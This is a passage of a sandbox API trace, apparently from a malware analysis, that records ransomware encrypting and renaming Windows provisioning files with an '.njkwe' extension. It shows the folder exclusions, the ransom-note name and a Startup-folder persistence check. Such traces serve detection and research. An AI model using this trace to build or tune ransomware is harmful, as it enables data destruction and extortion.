0x1153fc4 [0078.628] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.628] GetProcessHeap () returned 0xbe0000 [0078.628] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.628] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0078.629] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.630] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x28a, lpOverlapped=0x0) returned 1 [0078.630] GetProcessHeap () returned 0xbe0000 [0078.630] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.630] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.630] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.630] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.630] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.630] CloseHandle (hObject=0x43c) returned 1 [0078.630] GetProcessHeap () returned 0xbe0000 [0078.630] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.630] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0078.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\365__connections_cellular_ncc (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\365__Connections_Cellular_NCC (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\365__connections_cellular_ncc (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.631] GetProcessHeap () returned 0xbe0000 [0078.631] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.631] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d7548b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d7548b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d7548b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2a1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="366__C~1.PRO")) returned 1 [0078.631] lstrcmpiW (lpString1="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.631] lstrcmpiW (lpString1="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.631] lstrcmpiW (lpString1="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.631] lstrcmpiW (lpString1="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.631] lstrcmpiW (lpString1="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.631] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 187 [0078.631] StrStrIW (lpFirst="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.631] lstrcmpW (lpString1="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.631] lstrcmpW (lpString1="366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.631] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\366__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.631] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\366__connections_cellular_ntc (new telephone co) (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.632] GetTickCount () returned 0x1153fc4 [0078.632] GetTickCount () returned 0x1153fc4 [0078.632] GetTickCount () returned 0x1153fc4 [0078.632] GetTickCount () returned 0x1153fc4 [0078.632] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.632] GetProcessHeap () returned 0xbe0000 [0078.632] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.632] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2a1, lpOverlapped=0x0) returned 1 [0078.633] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.634] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2a1, lpOverlapped=0x0) returned 1 [0078.634] GetProcessHeap () returned 0xbe0000 [0078.634] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.634] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.634] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.634] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.634] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.634] CloseHandle (hObject=0x43c) returned 1 [0078.634] GetProcessHeap () returned 0xbe0000 [0078.634] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.634] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 207 [0078.634] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\366__connections_cellular_ntc (new telephone co) (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\366__Connections_Cellular_NTC (New Telephone Co) (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\366__connections_cellular_ntc (new telephone co) (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.635] GetProcessHeap () returned 0xbe0000 [0078.635] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.635] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d7548b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d7548b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d7548b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="367__C~1.PRO")) returned 1 [0078.635] lstrcmpiW (lpString1="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.635] lstrcmpiW (lpString1="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.635] lstrcmpiW (lpString1="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.635] lstrcmpiW (lpString1="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.636] lstrcmpiW (lpString1="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.636] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 182 [0078.636] StrStrIW (lpFirst="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.636] lstrcmpW (lpString1="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.636] lstrcmpW (lpString1="367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.636] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\367__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.636] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\367__connections_cellular_ojsc sibirtelecom (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.636] GetTickCount () returned 0x1153fc4 [0078.636] GetTickCount () returned 0x1153fc4 [0078.636] GetTickCount () returned 0x1153fc4 [0078.636] GetTickCount () returned 0x1153fc4 [0078.636] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.636] GetProcessHeap () returned 0xbe0000 [0078.636] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.636] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1f8, lpOverlapped=0x0) returned 1 [0078.638] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.638] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1f8, lpOverlapped=0x0) returned 1 [0078.638] GetProcessHeap () returned 0xbe0000 [0078.638] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.638] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.638] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.638] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.638] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.638] CloseHandle (hObject=0x43c) returned 1 [0078.638] GetProcessHeap () returned 0xbe0000 [0078.638] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.638] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 202 [0078.638] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\367__connections_cellular_ojsc sibirtelecom (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\367__Connections_Cellular_OJSC Sibirtelecom (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\367__connections_cellular_ojsc sibirtelecom (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.639] GetProcessHeap () returned 0xbe0000 [0078.639] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.639] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d7548b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d7548b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d7548b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="368__C~1.PRO")) returned 1 [0078.639] lstrcmpiW (lpString1="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.639] lstrcmpiW (lpString1="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.639] lstrcmpiW (lpString1="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.639] lstrcmpiW (lpString1="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.639] lstrcmpiW (lpString1="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.639] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 179 [0078.639] StrStrIW (lpFirst="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.640] lstrcmpW (lpString1="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.640] lstrcmpW (lpString1="368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.640] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\368__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.640] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\368__connections_cellular_ojsc vimpelcom (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.640] GetTickCount () returned 0x1153fd4 [0078.640] GetTickCount () returned 0x1153fd4 [0078.640] GetTickCount () returned 0x1153fd4 [0078.640] GetTickCount () returned 0x1153fd4 [0078.640] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.640] GetProcessHeap () returned 0xbe0000 [0078.640] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.640] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2e2, lpOverlapped=0x0) returned 1 [0078.672] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.672] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2e2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2e2, lpOverlapped=0x0) returned 1 [0078.672] GetProcessHeap () returned 0xbe0000 [0078.672] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.672] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.672] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.672] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.673] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.673] CloseHandle (hObject=0x43c) returned 1 [0078.673] GetProcessHeap () returned 0xbe0000 [0078.673] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.673] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 199 [0078.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\368__connections_cellular_ojsc vimpelcom (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\368__Connections_Cellular_OJSC VimpelCom (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\368__connections_cellular_ojsc vimpelcom (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.674] GetProcessHeap () returned 0xbe0000 [0078.674] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.674] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d7548b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d7548b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d7548b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="369__C~1.PRO")) returned 1 [0078.674] lstrcmpiW (lpString1="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.674] lstrcmpiW (lpString1="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.674] lstrcmpiW (lpString1="369__Connections_Cellular_PrimTel (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.674] lstrcmpiW 